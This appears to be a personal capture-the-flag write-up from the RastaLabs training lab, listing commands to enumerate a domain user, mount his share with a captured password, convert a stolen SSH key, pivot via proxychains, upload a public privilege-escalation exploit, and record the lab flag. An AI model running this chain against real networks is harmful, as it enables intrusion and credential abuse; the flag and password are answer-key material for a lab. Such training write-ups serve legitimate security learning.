<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>17 flag</title>
</head><body>in ws04, <br/>
<br/>
net user ahope /domain<br/>
will find his fs01 directory, mount it and get the nix01.ppk file<br/>
<br/>
<img src="screenshot.png" /><br/>
<br/>
net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"<br/>
<br/>
<img src="screenshot 2.png" /><br/>
<br/>
ppk is putty format file. to convert it to linux openssh format ---&gt; install putty-tools<br/>
<br/>
in ws01, add route and run socks4a proxy server<br/>
<br/>
<img src="screenshot 4.png" /><br/>
<br/>
puttygen nix01.ppk -O private-openssh -o nix<br/>
password - Labrador8209<br/>
<br/>
proxychains ssh -i nix ahope@10.10.122.20<br/>
<br/>
<img src="screenshot 3.png" /><br/>
<br/>
use the exploit for priv esca<br/>
exploit ---&gt; https://www.exploit-db.com/exploits/44298/<br/>
<br/>
gcc exp1.c -o exploit<br/>
<br/>
proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope<br/>
<br/>
proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta ----&gt; to download file from remote to local<br/>
<br/>
<img src="screenshot 5.png" /><br/>
<br/>
RASTA{y0ur3_4_b4ll3r_70_637_7h15}<br/>
<br/>
</body></html>